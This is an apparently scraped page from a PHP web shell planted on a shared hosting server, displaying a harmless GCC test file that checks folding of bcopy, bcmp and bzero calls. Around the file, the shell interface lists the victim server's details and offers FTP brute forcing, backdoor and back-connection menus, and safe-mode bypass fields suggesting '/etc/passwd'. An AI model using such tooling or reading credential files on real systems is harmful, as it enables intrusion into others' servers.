Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/gcc.dg/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     fold-bcopy.c (1.51 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* PR tree-optimization/80933 - redundant bzero/bcopy calls not eliminated
   { dg-do compile }
   { dg-options "-O1 -Wall -fdump-tree-lower" } */

void f0 (void *dst, const void *src, unsigned n)
{
  /* Bcopy(src, dst, ...) corresponds to memmove(dst, src, ...),
     with the first two arguments transposed, not memcpy.  */
  __builtin_bcopy (src, dst, n);
}

void f1 (void *p, const void *q, unsigned n)
{
  /* A call with zero size should be eliminated.  */
  __builtin_bcopy (q, p, 0);
}

int f2 (const void *p, const void *q, unsigned n)
{
  return __builtin_bcmp (p, q, n);
}

int f3 (const void *p, const void *q)
{
  /* A call with zero size should be folded into 0.  */
  return __builtin_bcmp (p, q, 0);
}

int f4 (const void *p, unsigned n)
{
  /* A call with the same argument should also be folded into 0.  */
  return __builtin_bcmp (p, p, n);
}

void f5 (void *p, unsigned n)
{
  __builtin_bzero (p, n);
}

void f6 (void *p)
{
  /* A call with zero size should be eliminated.  */
  __builtin_bzero (p, 0);
}

/* Verify that calls to bcmp, bcopy, and bzero have all been removed
   and one of each replaced with memcmp, memmove, and memset, respectively.
   The remaining three should be eliminated.
  { dg-final { scan-tree-dump-not "bcmp|bcopy|bzero" "lower" } }
  { dg-final { scan-tree-dump-times "memcmp|memmove|memset" 3 "lower" } }

  Verify that the bcopy to memmove transformation correctly transposed
  the source and destination pointer arguments.
  { dg-final { scan-tree-dump-times "memmove \\(dst, src" 1 "lower" } }  */

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0061 ]--